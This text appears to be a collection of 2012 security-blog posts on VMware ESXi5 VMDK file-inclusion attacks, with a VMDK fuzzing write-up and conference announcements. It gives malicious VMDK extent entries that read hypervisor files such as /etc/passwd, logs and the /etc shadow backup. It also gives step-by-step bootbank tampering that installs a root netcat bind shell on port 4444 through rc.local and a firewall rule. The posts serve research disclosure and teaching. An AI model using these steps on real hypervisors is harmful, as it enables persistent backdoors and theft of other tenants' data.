Insinuator


Some outright rants from a bunch of infosec practitioners.


In our last series of posts on the VMDK file inclusion attack, we focused on read access and the prerequisites for the attack, but said little about potential write access. As we promised to cover write access in the course of our future research, the following post describes our latest research results.

First of all, the same prerequisites (which will be refined a little bit more later on) as for read access must be fulfilled, and the same steps have to be performed in order to carry out the attack successfully. If that is the case, there are several POIs (Partitions Of Interest) on an ESXi hypervisor that are worth including:

  • /bootbank → contains several archives which build the hypervisor’s filesystem once they are unpacked
  • /altbootbank → backup of the prior version of bootbank, e.g. copied before a firmware update
  • /scratch → mainly stores log files and core dumps
  • /vmfs/volumes/datastoreX → storage for virtual machine files

The root filesystem is stored on a ramdisk which is populated at boot time from the archives stored in the bootbank partition. This means there is no actual root partition (it is generated dynamically at boot time, and there is no such thing as a device node for the ramdisk), which excludes the root file system from our attack tree, at least at first sight.

While trying to write to different partitions, we noticed that the writing sometimes fails. Investigating the reason for the failure, we noticed that this is only the case for certain partitions, such as /scratch. After monitoring the specific write process, we observed the following errors:

Virtual Machine:

attx kernel: [93.238762] sd 0:0:0:0: [sda] Unhandled sense code
attx kernel: [93.238767] sd 0:0:0:0: [sda]  Result: hostbyte=invalid
                         driverbyte=DRIVER_SENSE
attx kernel: [93.238771] sd 0:0:0:0: [sda]  Sense Key : Data Protect [current]
attx kernel: [93.238776] sd 0:0:0:0: [sda]  Add. Sense: No additional sense information
attx kernel: [93.238780] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 02 04 bd 20 00 00 08 00
attx kernel: [93.238790] end_request: critical target error, dev sda, sector 33864992
attx kernel: [93.239029] Buffer I/O error on device sda, logical block 4233124
attx kernel: [93.239181] lost page write due to I/O error on sda

Hypervisor:

cpu0:2157)WARNING: NMP: nmpDeviceTaskMgmt:2210:Attempt to issue lun reset on device
                        naa.600508b1001ca97740cc02561658c136. This will clear any
                        SCSI-2 reservations on the device.
cpu0:2157)<4>hpsa 0000:05:00.0: resetting device 6:0:0:1
cpu0:2157)<4>hpsa 0000:05:00.0: device is ready

Assuming that the hypervisor hard drive is not broken exactly in those cases where we try to write from within a guest machine, we performed further tests (using various bash scripts and endless writing loops) and found that this error occurs when the hypervisor and a guest machine try to write to the same device at the same time. Since the hypervisor continuously writes log files to the /scratch file system and generates all kinds of I/O on the /vmfs data stores (due to the running virtual machines stored on that partition), it was not possible to write to those devices in a reliable way.
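
To give an idea of those tests: a minimal sketch of such an endless writing loop from within the guest, assuming the included hypervisor partition shows up as /dev/sdb (the device name and the seek offset are assumptions, not taken from our actual scripts):

#!/bin/sh
# Hedged sketch: keep writing to the included hypervisor partition and
# report any I/O errors; /dev/sdb and the seek offset are assumptions.
while true; do
    dd if=/dev/zero of=/dev/sdb bs=512 seek=1024 count=8 2>&1 \
        | grep -i "error" && echo "write failed at $(date)"
    sleep 1
done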

Fortunately (at least from an attacker’s point of view ;) ), the remaining partitions, /bootbank and /altbootbank, are only accessed at boot time, and it is hence possible to write to those partitions in a reliable way. At that point, the initially mentioned fact about the missing root partition becomes important again: While the root partition would be the first and most promising target for write access, it would most probably also be locked by the hypervisor, as some of its files are written to periodically. So when we were searching for a way to write to the dynamically generated root partition, we came up with the following steps:

  • Include the device holding the /bootbank partition.
  • Write to the /bootbank partition.
  • Wait for the hypervisor to reboot (or perform the potential DoS attack we identified, which will be described in a future post).
  • Enjoy the files from the /bootbank partition being populated to the dynamically created root partition.

The last step is of particular relevance. /bootbank holds several files that contain archives of system-critical files and directories of the ESXi hypervisor. For example, /bootbank/s.v00 contains an archive of directories and files, including parts of /etc. The hypervisor restores these directories (such as /etc) at startup from the files stored in /bootbank. As we are able to write files to /bootbank, it is possible to replace the contents of /bootbank/s.v00 and thus the contents of /etc on the hypervisor ramdisk. To make sure that certain files in /etc actually get replaced, we can consult /bootbank/boot.cfg, which holds the list of archives that get extracted at boot time. As we now have all necessary information to write to the root partition of the hypervisor, these are the steps to be performed:

  • Obtain a /bootbank archive, in this example /bootbank/s.v00, using the well-known attack vector.
  • Convert/extract the archive: The archives in /bootbank are packed with a special version of tar which is incompatible with GNU tar. However, this vmtar version can be ported to a GNU/Linux system by copying the vmtar binary and libvmlibs.so from any ESXi installation (see the sketch after this list).
  • Modify or add files.
  • Repack the archive.
  • Deploy the modified archive to /bootbank using the write access.
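
A minimal sketch of this unpack/modify/repack cycle on a Linux box, assuming vmtar and libvmlibs.so have been copied into the current directory (the exact vmtar option syntax is an assumption and may differ between ESXi builds):

export LD_LIBRARY_PATH=.                  # so vmtar finds libvmlibs.so
./vmtar -x s.v00 -o s.tar                 # convert the vmtar archive to plain tar
mkdir extracted && tar xf s.tar -C extracted
# ... modify or add files below extracted/, e.g. extracted/etc/rc.local ...
( cd extracted && tar cf ../s-mod.tar . )
./vmtar -c s-mod.tar -o s.v00             # repack as a vmtar archive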

Following this generic process, we were able to install a backdoor on our ESXi5 hypervisor. In a first step, we opened a port in the ESXi firewall (which has a drop-all policy), as we wanted to deploy a bind shell (we could have used a connect-back shell instead, but we also wanted to demonstrate that it is possible to modify system-critical settings). The firewall is configured by XML files stored in /etc/vmware/firewall. These XML files are structured as follows:

<ConfigRoot>
  <service id='0000'>
    <id>sshServer</id>
    <rule id='0000'>
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>22</port>
    </rule>
    <enabled>false</enabled>
    <required>false</required>
  </service>
[...]
</ConfigRoot>

The XML format is more or less self-explanatory: Every service has a unique identifier id and can have inbound and outbound rules. To enable a rule at system boot, the enabled field has to be set to true.

Based on this schema, it is easy to deploy a new firewall rule: Simply place a new XML file in /etc/vmware/firewall within the archive which will be written to the bootbank later on.

For example, to open port 4444 (the port our bind shell will listen on):

<ConfigRoot>
  <service id="0000">
    <id>remote Bind Shell</id>
    <rule id="0000">
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>4444</port>
    </rule>
    <enabled>true</enabled>
    <required>false</required>
  </service>
</ConfigRoot>

This ruleset will be applied the next time the hypervisor reboots, after we have overwritten one of the archives in bootbank with our altered one.

The next step is to bind a shell to the opened port. Unfortunately, the netcat installed by default on the hypervisor does not support the “-e” option, which executes a command once a connection is established. The most basic netcat bind shell just listens on a port and connects all input and output to the binary specified by the -e switch:

netcat -l -p 4444 -e /bin/sh

Luckily, the netcat version of the 32-bit BackTrack distribution is compatible with the ESXi platform and supports the -e switch. After copying this binary to the hypervisor, we just need to make sure that the backdoor is started during the boot process by adding the following line to /etc/rc.local:

/etc/netcat -l -p 4444 -e /bin/sh &

Next time the hypervisor starts, a remote shell will listen on port 4444 with root privileges. The following steps summarize the process of fully compromising the ESXi hypervisor:

  • Include the /bootbank partition using our well-known attack path
  • Unpack /bootbank/s.v00
  • Add our bind shell port to the firewall by adding the described file to /path/to/extracted/etc/vmware/firewall
  • Add the netcat binary as /path/to/extracted/etc/netcat
  • Add the above line to /path/to/extracted/etc/rc.local
  • Wait for the next reboot of the hypervisor (or our post on the potential DoS ;) ) and connect to the bind shell as sketched below
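
Once the hypervisor has rebooted, reaching the backdoor is a one-liner from any machine that can reach the host (the host name below is a placeholder):

nc esxi-host.example.com 4444    # commands entered here run as root on the ESXi host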

At the end of the day, this means that once an attacker is able to upload VMDK files to an ESXi environment (in a way that fulfills the stated requirements), it is possible to alter the configuration of the underlying hypervisor and even to install a backdoor which grants command line access.


Enjoy!

Pascal & Matthias


May 30, 2012

Fuzzing VMDK files

As announced at last week’s #HITB2012AMS, I’ll describe the fuzzing steps which were performed during our initial research. The very first step was the definition of the interfaces we wanted to test. We decided to go with the plain text VMDK file, as this is the main virtual disk description file and in most deployment scenarios user controlled, and with the data part of a special kind of VMDK file, the Host Sparse Extents.

The fuzzing toolkit used is dizzy, which just got an update last week (bringing you guys closer to trunk state ;) ).

Fuzzing-wise, the main VMDK file is straightforward. Here is a short sample file:

# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=fffffffe
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 40960 VMFS "ts_2vmdk-flat.vmdk"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "c818e173248456a9f5d83051fffffffe"
ddb.uuid = "60 00 C2 94 23 7b c1 41-51 76 b2 79 23 b5 3c 93"
ddb.geometry.cylinders = "20"
ddb.geometry.heads = "64"
ddb.geometry.sectors = "32"
ddb.adapterType = "buslogic"


As one can easily see, the file is plain text and based upon a name=value syntax. So a fuzzing script for this file would look something like this:

name = "vmdkfile"
objects = [
    field("descr_comment", None, "# Disk DescriptorFile\n", none),

    field("version_str", None, "version=", none),
    field("version", None, "1", std),
    field("version_br", None, "\n", none),

    field("encoding_str", None, "encoding=", none),
    field("encoding", None, '"UTF-8"', std),
    field("encoding_br", None, "\n", none),
    [...]
    ]
functions = []


The first field, descr_comment, and the second field, version_str, are plain static, as defined by the last parameter, so they won’t get mutated. The first actually fuzzed field is version, which has a default value of the string "1" and will be mutated with all strings in your fuzz library.

As the attentive reader might have noticed, this is just a first attempt, as there is one special inconsistency in the example file above: the quoting. Some values are quoted, some are not. A good fuzzing script would try to play with exactly this inconsistency: Is it possible to set version to a string? Could one set the encoding to an integer value?

The second file we tried to fuzz was the Host Sparse Extent, a data file which, unlike the Flat Extents, is not plain data but has a binary file header. This header is parsed by the ESX host and, as it is included in the data file, may be user defined. The definition from VMware is the following:

typedef struct COWDisk_Header {
    uint32 magicNumber;
    uint32 version;
    uint32 flags;
    uint32 numSectors;
    uint32 grainSize;
    uint32 gdOffset;
    uint32 numGDEntries;
    uint32 freeSector;
    union {
        struct {
            uint32 cylinders;
            uint32 heads;
            uint32 sectors;
        } root;
        struct {
            char parentFileName[COWDISK_MAX_PARENT_FILELEN];
            uint32 parentGeneration;
        } child;
    } u;
    uint32 generation;
    char name[COWDISK_MAX_NAME_LEN];
    char description[COWDISK_MAX_DESC_LEN];
    uint32 savedGeneration;
    char reserved[8];
    uint32 uncleanShutdown;
    char padding[396];
} COWDisk_Header;


Interesting header fields are all C strings (think about NULL termination) and of course gdOffset in combination with numSectors and grainSize, as manipulating these values could lead the ESX host to access data outside of the user-deployed data file.

So far, so good. After writing the fuzzing scripts, one needs to create a lot of VMDK files. This was done using dizzy:

./dizzy.py -o file -d /tmp/vmdkfuzzing.vmdk -w 0 vmdkfile.dizz


Last but not least, we needed to automate the deployment of the generated VMDK files. This was done with a simple shell script on the ESX host, using vim-cmd, a command line tool to administer virtual machines.
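
The actual script is not included here; the following is a minimal sketch of what such a deployment loop could look like on the ESXi host, assuming the fuzzed descriptors land in a datastore directory and a prepared fuzzvm.vmx references the descriptor (all paths, names, and timings are assumptions):

#!/bin/sh
# Hedged sketch: register, boot, and tear down a VM for every fuzzed VMDK.
for f in /vmfs/volumes/datastore1/fuzzcases/*.vmdk; do
    cp "$f" /vmfs/volumes/datastore1/fuzzvm/ts_2vmdk.vmdk
    VMID=$(vim-cmd solo/registervm /vmfs/volumes/datastore1/fuzzvm/fuzzvm.vmx)
    vim-cmd vmsvc/power.on "$VMID" || echo "power-on failed for $f"
    sleep 10
    vim-cmd vmsvc/power.off "$VMID" > /dev/null 2>&1
    vim-cmd vmsvc/unregister "$VMID"
done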

As of now, the main fuzzing is still running in our lab, so no big results on that front yet. Feel free to use the provided fuzzing scripts in your own lab; find the two fuzzing scripts here and here. We will share more results when the fuzzing is finished.

Have a nice day and start fuzzing ;)

Daniel and Pascal


A quick update on the workshop we’ve just finished at Hack in the Box 2012 Amsterdam:
Due to popular demand, we decided to bring the slides online without wasting any more time. The official website of the conference is currently experiencing some problems due to the high interest in everything that was released in the last two days. Great conference!

Here you go: HITB2012AMS ERNW VMDK Has Left the Building [PDF, 6MB, link fixed]

Enjoy and feel free to express your thoughts in the comments.

Best greetings from Amsterdam,
Florian & the crew


Update #1: Slides are available for download here.

In the course of our ongoing cloud security research, we’re continuously thinking about potential attack vectors against public cloud infrastructures. Approaching this enumeration from an external customer’s (read: attacker’s ;) ) perspective, there are the following possibilities to communicate with, and thus send malicious input to, typical cloud infrastructures:

  • Management interfaces
  • Guest/hypervisor interaction
  • Network communication
  • File uploads

As there are already several successful exploits against management interfaces (e.g. here and here) and guest/hypervisor interaction (see for example this one; yes, this is the funny one with the ridiculous recommendation “Do not allow untrusted users access to your virtual machines.” ;-)), we’re focusing on the upload of files to cloud infrastructures in this post. In our experience with major Infrastructure-as-a-Service (IaaS) cloud providers, the most relevant file upload possibility is the deployment of already existing virtual machines to the provided cloud infrastructure. Since quick additional research shows that most of those providers allow the upload of VMware-based virtual machines and since, to the best of our knowledge, the VMware virtualization file format has not yet been analyzed for potential vulnerabilities, we want to provide an analysis of the relevant file types and present the resulting attack vectors.

While there are a lot of VMware-related file types, a typical virtual machine upload functionality comprises at least two of them:

  • VMX
  • VMDK

The VMX file is the configuration file describing the characteristics of the virtual machine, such as included devices, names, or network interfaces. VMDK files specify the hard disk of a virtual machine and mainly comprise two types of files: the descriptor file, which describes the specific setup of the actual disk, and several disk files containing the actual file system for the virtual machine. The following listing shows a sample VMDK descriptor file:


# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=a5c61889
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "machine-flat01.vmdk"
RW 33554432 VMFS "machine-flat02.vmdk"
[...]

For this post, it is of particular importance that the reference to the actual disk file containing the raw device data (in the listing, the so-called “Extent description”) allows the inclusion of multiple files or devices. The deployment of these files into a (public) cloud/virtualized environment can be broken down into several steps:

  1. Upload to the cloud environment: e.g. by using FTP, web interfaces, or $WEB_SERVICE_API (such as the Amazon SOAP API, which admittedly does not allow the upload of virtual machines at the moment).
  2. Move to the data store: The uploaded virtual machine must be moved to the data store, which is typically some kind of back end storage system/SAN where shares can be attached to hypervisors and guests.
  3. Deployment on the hypervisor (“starting the virtual machine”): This can include an additional step of “cloning” the virtual machine from the back end storage system to local hypervisor hard drives.

To analyze this process more thoroughly, we built a small lab based on VMware vSphere 5 including

  • an ESXi5 hypervisor,
  • NFS-based storage, and
  • vCenter,

everything fully patched as of 2012/05/24. The deployment process we used was based on common practices we know from different customer projects: The virtual machine was copied to the storage, which is accessible from the hypervisor, and was deployed on the ESXi5 host using the vmware-cmd utility, which drives the VMware API.
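
The exact invocation is not part of this post; as a hedged example, registering a VM this way via the remote vSphere CLI could look like the following (host name, credentials, and paths are placeholders):

vmware-cmd -H esxi5.lab.local -U root -P secret -s register \
    "/vmfs/volumes/nfs-datastore/victim/victim.vmx"

Thinking about actual attacks in this environment, two main approaches come to mind: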

  • Fuzzing attacks: Given ERNW’s long tradition in the area of fuzzing, this seems to be a viable option. Still, this is not in scope of this post, but we’ll lay out some things tomorrow in our workshop at #HITB2012AMS.
  • File Inclusion Attacks.

Focusing on the latter, the descriptor file (see above) contains several fields which are worth a closer look. Even though the specification of the VMDK descriptor file will not be discussed here in detail, the most important field for this post is the so-called Extent Description. The extent descriptions basically contain the paths to the actual raw disk files holding the file system of the virtual machine, as included in the listing above.

The most obvious idea is to change the path of the actual disk file to another path somewhere in the ESX file system, like the good ol’ /etc/passwd:


# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=a5c61889
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "machine-flat01.vmdk"
RW 0 VMFSRAW "/etc/passwd"

Unfortunately, this does not seem to work and results in an error message, as the next screenshot shows:

As we are highly convinced that a healthy dose of perseverance (not to say stubbornness ;-) ) is part of any hacker’s/pentester’s attributes, we gave it several other tries. As the file to be included was a raw disk file, we focused on files in binary formats. After some enumeration, we were actually able to include gzip-compressed log files. Since we are now able to access files included in the VMDK from inside the guest virtual machine, this must be clearly stated: We can get access to the log files of the ESX hypervisor by deploying a guest virtual machine – a very nice first step! Including further compressed files, we also included /bootbank/state.tgz. This file contains a complete backup of the /etc directory of the hypervisor, including e.g. /etc/shadow – once again, this inclusion was possible from a GUEST machine! As the following screenshot visualizes, the necessary steps to include files from the ESXi5 host comprise creating a loopback device which points to the actual file location (since it is part of the overall VMDK) and extracting the contents of this loopback device:
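
For readers without the screenshot at hand, a hedged sketch of these steps from within the guest (the device name and the extent offset are assumptions; the included file begins where its extent begins inside the guest-visible disk):

# the second extent starts right after the first one,
# i.e. at <sectors of first extent> * 512 bytes into the disk
losetup -o $((33554432 * 512)) /dev/loop0 /dev/sda
dd if=/dev/loop0 of=/tmp/state.tgz bs=1M count=1   # 1 MB is an assumed upper bound on the file size
mkdir -p /tmp/esx-etc
tar xzf /tmp/state.tgz -C /tmp/esx-etc             # gzip warns about, but ignores, trailing garbage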

The screenshot also shows how it is possible to access information clearly belonging to the ESXi5 host from within the guest system. Even though this alone allows a whole bunch of possible attacks, coming back to the original inclusion of raw disk files, the physical hard drives of the hypervisor qualify as a very interesting target. A look at the device files of the hypervisor (see next screenshot) reveals that the device names are generated in a not-easily-guessable way:

Using this knowledge gathered from the hypervisor (to be clearly noted at this point: we are relying on knowledge obtained through our administrative hypervisor access), it was also possible to include the physical hard drives of the hypervisor. Even though we needed this additional knowledge for the inclusion, the sheer fact that it is possible for a GUEST virtual machine to access the physical hard drives of the hypervisor is a pretty big deal! As you still might have our stubbornness in mind, it is obvious that we wanted to make this inclusion work without any prior knowledge about the hypervisor. So let’s provide you with a way to access any data in a vSphere based cloud environment without further knowledge:

  1. Ensure that the following requirements are met:
    • ESXi5 hypervisor in use (we’re still researching how to port these vulnerabilities to ESX4)
    • Deployment of externally provided (in our case, read: malicious ;-) ) VMDK files is possible
    • The cloud provider performs the deployment using the VMware API (e.g. in combination with external storage, which is, as laid out above, a common practice) without further sanitization/input validation/VMDK rewriting.
  2. Deploy a virtual machine referencing /scratch/log/hostd.0.gz (see the descriptor sketch after this list)
  3. Access the included /scratch/log/hostd.0.gz within the guest system and grep for ESXi5 device names ;-)
  4. Deploy another virtual machine referencing the extracted device names
  5. Enjoy access to all physical hard drives of the hypervisor ;-)
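
To make step 2 concrete: a hedged sketch of the malicious extent lines, following the descriptor syntax shown earlier (the sizes and the VMFSRAW type are assumptions carried over from our earlier experiments):

# Extent description
RW 33554432 VMFS "machine-flat01.vmdk"
RW 0 VMFSRAW "/scratch/log/hostd.0.gz"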

It must be noted that the hypervisor hard drives contain the so-called VMFS, which cannot easily be mounted within e.g. a Linux guest machine, but it can be parsed for data, accessed using VMware specific tools, or exported to be mounted on another hypervisor under our own administrative control.
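
One option not covered in this post: the open-source vmfs-tools project provides a read-only FUSE driver for VMFS, so a Linux guest could inspect the included volume directly (assuming the tools are installed; the device and partition number are placeholders):

vmfs-fuse /dev/sdb3 /mnt/vmfs   # read-only FUSE mount of the VMFS partition
ls /mnt/vmfs                    # browse the virtual machine directories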

Summarizing the most relevant and devastating message:

VMware vSphere 5 based IaaS cloud environments potentially contain possibilities to access other customers’ data…

We’ll conduct some “testing in the field” in the upcoming weeks and get back to you with the results in a whitepaper to be published on this blog. In any case, this type of attack might provide yet another path for accessing other tenants’ data in multi-tenant environments, even though more research work is needed here. If you have the opportunity, you might want to join our workshop at #HITB2012AMS.

Have a great day,

Pascal, Enno, Matthias, Daniel


Reading this advisory, I’m quite tempted to emit another rant on the relationship between heavy use of 3rd party components, lack of (security) quality assurance, and services running at times when they’re not needed (see the second workaround here). I’ll refrain from that for today. Just wanted to let you know that the underlying vulnerability in Struts2 was initially discovered by Meder Kydyraliev, who gives this talk at Troopers in two weeks. He’ll certainly describe the inner workings of this one, and others… ;-)

Have a good one,

Enno


Just wanted to let you know that we sent out ERNW Newsletter 32 at the end of last week. As promised, it includes the results of our research regarding the question “Is browser virtualization a valid security control in order to mitigate browser based security risks?”.

Simon did a great job writing the latest newsletter. It’s a 30-page document which should give you a basis for well-informed decisions when it comes to the deployment of an application virtualization technology.

Download a signed version of the PDF here, or visit the archive to browse other issues of our highly technical newsletters.

Best wishes,
Florian

